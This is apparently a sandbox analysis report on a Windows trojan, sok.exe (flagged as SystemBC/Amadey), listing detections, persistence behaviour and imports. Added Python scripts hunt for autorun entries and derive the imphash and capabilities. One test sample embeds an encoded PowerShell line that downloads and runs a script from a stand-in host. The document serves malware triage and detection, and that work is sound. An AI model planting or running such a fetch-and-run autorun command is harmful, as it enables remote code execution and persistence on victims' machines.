Field | Value |
---|---|
Created | 2024.05.03 07:46 |
Machine | s1_win7_x6401 |
Filename | sok.exe |
Type | PE32 executable (GUI) Intel 80386, for MS Windows |
AI Score | |
Behavior Score | |
ZERO API | file: clean |
VT API (file) | 56 detected (AIDetectMalware, Coroxy, Malicious, score, ExploitDcomRpc, Fragtor, unsafe, Vnoh, Attribute, HighConfidence, high confidence, Artemis, TrojanX, Garvi, kljjsw, Generic@AI, RDML, t4NxsROVAUg8sWaXwJ7j+A, inrqv, AMADEY, YXEEBZ, high, Outbreak, Detected, ai score=88, cej@4pux8h, Znyonm, Eldorado, ZexaF, aqW@aiwXm5p, BScope, TrojanProxy, Sybici, Genetic, Pzfl, Static AI, Malicious PE, susgen) |
md5 | ec7154a50488ecfd5936b6fd10e0a8e3 |
sha256 | 05135a36e3f36578a55ec1a8d0e3628a4f8912bf3c65f865cf793b58db27f357 |
ssdeep | 96:1y1jUdvqRWXKB1Jww9uKT2MjQcHnjKVOIw+6dT8CKB8tBkLOq:gtKSREKB1aFKjKVV8ToUBk |
imphash | a7f2be9d198a373f121c5bf0d47787e0 |
impfuzzy | 12:wSgZGGKOHGloj7btzudRURgQKl0ydJWJ9JDJKEKHG/UJXL5JxHDsVpoYdrSgaG:wSA4rojtzudaJOVG8VRjshZSgD |
Network IP location
Signatures (5)
Level | Description |
---|---|
danger | Connects to IP addresses that no longer respond to requests (legitimate services usually stay up) |
danger | File has been identified by 56 AntiVirus engines on VirusTotal as malicious |
watch | Communicates with a host for which no DNS query was performed |
watch | Installs itself for autorun at Windows startup |
watch | Stores PowerShell commands in the registry, likely for persistence |
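The two persistence signatures above (autorun at startup, PowerShell stored in the registry) are what a responder would go looking for on a host. As an added example, not part of the sandbox report, the following Python script shows how those findings look in data an analyst can collect with `reg export HKCU\Software\Microsoft\Windows\CurrentVersion\Run`: it parses a `.reg` export, keeps only Run/RunOnce values, flags PowerShell one-liners (decoding `-EncodedCommand` payloads) and executables living in user-writable directories. The sample export, its value names, paths and the hidden command are constructed for this example and are not taken from the report.

```python
"""Hunt for PowerShell and user-writable-path autoruns in a .reg export.

Added example, not part of the sandbox report. The sample export below is
constructed for the example; its value names, paths and command are
hypothetical.
"""
import base64
import re

RUN_KEYS = re.compile(
    r"\\Microsoft\\Windows\\CurrentVersion\\(Run|RunOnce|RunServices)\b", re.I)
ENC_FLAG = re.compile(
    r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
USER_WRITABLE = re.compile(r"\\(AppData|Temp|ProgramData|Users\\Public)\\", re.I)
_VALUE_LINE = re.compile(r'"((?:[^"\\]|\\.)*)"=(?:"((?:[^"\\]|\\.)*)")?')


def encode_ps(command):
    """-EncodedCommand form: base64 of the UTF-16LE command text."""
    return base64.b64encode(command.encode("utf-16-le")).decode()


def decode_ps(blob):
    return base64.b64decode(blob).decode("utf-16-le")


# Constructed sample export (not from the report): one benign entry, one
# executable in a user-writable path, one encoded PowerShell one-liner.
HIDDEN_CMD = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/s.ps1')"
SAMPLE_REG = "\r\n".join([
    "Windows Registry Editor Version 5.00",
    "",
    r"[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]",
    r'"Vendor Updater"="\"C:\\Program Files\\Vendor\\updater.exe\" /quiet"',
    r'"svc"="C:\\Users\\user\\AppData\\Roaming\\sok.exe"',
    f'"upd"="powershell.exe -w hidden -nop -enc {encode_ps(HIDDEN_CMD)}"',
    "",
    r"[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer]",
    r'"ShellState"=hex:24,00,00,00',
])


def _unescape(s):
    """.reg string escapes: \\ becomes \ and \" becomes "."""
    return re.sub(r"\\(.)", r"\1", s)


def parse_reg(text):
    """Yield (key, value_name, data) for the REG_SZ values of a .reg export.
    Only quoted string data is handled; hex:/dword: values are skipped."""
    key = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
        elif key and line.startswith('"'):
            m = _VALUE_LINE.match(line)
            if m and m.group(2) is not None:
                yield key, _unescape(m.group(1)), _unescape(m.group(2))


def flag_autoruns(reg_text):
    """Return one finding per suspicious Run-key value, in file order."""
    findings = []
    for key, name, data in parse_reg(reg_text):
        if not RUN_KEYS.search(key):
            continue
        reasons, decoded = [], None
        if "powershell" in data.lower():
            reasons.append("powershell-in-autorun")
            m = ENC_FLAG.search(data)
            if m:
                try:
                    decoded = decode_ps(m.group(1))
                    reasons.append("encoded-command")
                except (ValueError, UnicodeDecodeError):
                    # base64 or UTF-16 garbage: still worth a look
                    reasons.append("undecodable-encoded-command")
        if USER_WRITABLE.search(data):
            reasons.append("user-writable-path")
        if reasons:
            findings.append({"key": key, "name": name, "data": data,
                             "reasons": reasons, "decoded": decoded})
    return findings


if __name__ == "__main__":
    for f in flag_autoruns(SAMPLE_REG):
        print(f["name"], f["reasons"], f["decoded"] or f["data"])
```

The user-writable-path check is a weak signal on its own (some legitimate software does install under `AppData`), so treat it as a prompt to hash the referenced file and compare against the report's md5/sha256 rather than as a verdict. Also export `HKLM` and the `Wow6432Node` Run keys; the script only looks at whatever export it is handed.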
Rules (5)
Level | Name | Description | Collection |
---|---|---|---|
danger | SystemBC_IN | SystemBC | binaries (upload) |
watch | Antivirus | Contains references to security software | binaries (upload) |
watch | Malicious_Library_Zero | Malicious_Library | binaries (upload) |
info | IsPE32 | (no description) | binaries (upload) |
info | PE_Header_Zero | PE File Signature | binaries (upload) |
PE API

IAT (Import Address Table)

user32.dll
  0x402050 wsprintfA
kernel32.dll
  0x402010 CreateThread
  0x402014 ExitProcess
  0x402018 GetModuleFileNameA
  0x40201c GetVolumeInformationA
  0x402020 CreateEventA
  0x402024 LocalFree
  0x402028 CloseHandle
  0x40202c Sleep
  0x402030 VirtualAlloc
  0x402034 VirtualFree
  0x402038 WaitForSingleObject
  0x40203c LocalAlloc
  0x402040 SetEvent
advapi32.dll
  0x402000 RegSetValueExA
  0x402004 RegCreateKeyExA
  0x402008 RegCloseKey
wsock32.dll
  0x402068 WSAStartup
  0x40206c closesocket
  0x402070 connect
  0x402074 htons
  0x402078 inet_addr
  0x40207c inet_ntoa
  0x402080 ioctlsocket
  0x402084 recv
  0x402088 select
  0x40208c send
  0x402090 setsockopt
  0x402094 shutdown
  0x402098 socket
ws2_32.dll
  0x402058 freeaddrinfo
  0x40205c WSAIoctl
  0x402060 getaddrinfo
secur32.dll
  0x402048 GetUserNameExA

EAT (Export Address Table): none
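The import table above is small enough to read by hand, but the same reading is worth automating when triaging many samples. As an added example, not part of the sandbox report, the following Python script re-derives two things from the listed imports: the imphash, using the normalization pefile applies (lowercase `dll.function` pairs in import order, extension stripped, MD5 of the comma-joined list), and a set of capability tags for API combinations that line up with the report's signatures (raw socket client, connect to a literal IP without DNS, registry write for autorun, host fingerprinting). The capability groups and the watchlist of absent APIs are this example's own assumptions, not sandbox output; the computed imphash only matches the report's if the listing order is the import-directory order and no import is by ordinal, and this example does not reproduce pefile's ordinal-to-name table for `ws2_32`/`oleaut32`.

```python
"""Import-table triage for the sok.exe report above.

Added example, not part of the sandbox report: computes the imphash with the
normalization pefile uses and tags capabilities implied by API combinations.
The capability rules and the absent-API watchlist are assumptions.
"""
import hashlib

# Transcribed from the report's IAT section; dict order is the DLL order shown.
# An import by ordinal would be given as an int, e.g. "ws2_32.dll": [23].
REPORT_IAT = {
    "user32.dll": ["wsprintfA"],
    "kernel32.dll": [
        "CreateThread", "ExitProcess", "GetModuleFileNameA",
        "GetVolumeInformationA", "CreateEventA", "LocalFree", "CloseHandle",
        "Sleep", "VirtualAlloc", "VirtualFree", "WaitForSingleObject",
        "LocalAlloc", "SetEvent",
    ],
    "advapi32.dll": ["RegSetValueExA", "RegCreateKeyExA", "RegCloseKey"],
    "wsock32.dll": [
        "WSAStartup", "closesocket", "connect", "htons", "inet_addr",
        "inet_ntoa", "ioctlsocket", "recv", "select", "send", "setsockopt",
        "shutdown", "socket",
    ],
    "ws2_32.dll": ["freeaddrinfo", "WSAIoctl", "getaddrinfo"],
    "secur32.dll": ["GetUserNameExA"],
}

# Assumed capability rules: a tag applies when every listed API is imported.
CAPABILITY_RULES = {
    "socket-client": {"socket", "connect", "send", "recv"},
    "nonblocking-io": {"ioctlsocket", "select"},
    "literal-ip-connect": {"inet_addr", "connect"},   # dotted-quad C2, no DNS needed
    "dns-resolve": {"getaddrinfo"},
    "registry-write": {"RegCreateKeyExA", "RegSetValueExA"},  # e.g. Run-key autorun
    "host-fingerprint": {"GetVolumeInformationA", "GetUserNameExA"},
    "own-path-lookup": {"GetModuleFileNameA"},
}

# Assumed watchlist: APIs whose absence from a *static* IAT is worth noting,
# since a sample can still reach them through a hashed or manual resolver.
NOTABLE_ABSENT = {
    "CreateProcessA", "CreateProcessW", "ShellExecuteA", "WinExec",
    "LoadLibraryA", "GetProcAddress",
}


def _normalize_dll(dll):
    """pefile's imphash rule: lowercase, drop a .dll/.ocx/.sys extension."""
    name = dll.lower()
    base, dot, ext = name.rpartition(".")
    return base if dot and ext in ("dll", "ocx", "sys") else name


def import_string(iat):
    """Comma-joined 'dll.func' entries in import order, all lowercase."""
    parts = []
    for dll, funcs in iat.items():
        lib = _normalize_dll(dll)
        for func in funcs:
            # pefile maps known ws2_32/oleaut32 ordinals to names; this
            # example only emits the generic ordN form for ordinal imports.
            name = f"ord{func}" if isinstance(func, int) else func
            parts.append(f"{lib}.{name.lower()}")
    return ",".join(parts)


def imphash(iat):
    """MD5 of the normalized import string, as used for the imphash field."""
    return hashlib.md5(import_string(iat).encode()).hexdigest()


def all_functions(iat):
    return {f for funcs in iat.values() for f in funcs if isinstance(f, str)}


def capability_tags(iat, rules=CAPABILITY_RULES):
    funcs = all_functions(iat)
    return sorted(tag for tag, need in rules.items() if need <= funcs)


def absent_apis(iat, watchlist=NOTABLE_ABSENT):
    return sorted(watchlist - all_functions(iat))


if __name__ == "__main__":
    print("imphash :", imphash(REPORT_IAT))
    print("tags    :", ", ".join(capability_tags(REPORT_IAT)))
    print("not in static IAT:", ", ".join(absent_apis(REPORT_IAT)))
```

Two things in the output are worth a second look when the sample is opened in a disassembler. First, `registry-write` and `literal-ip-connect` match the sandbox observations (autorun installation, traffic to a host that was never resolved through DNS). Second, none of the process-creation or dynamic-resolution APIs on the watchlist appear in the static IAT, so whatever PowerShell command is written to the registry is either launched by the autorun mechanism itself or through a resolver this import table does not show; the static list alone cannot settle which.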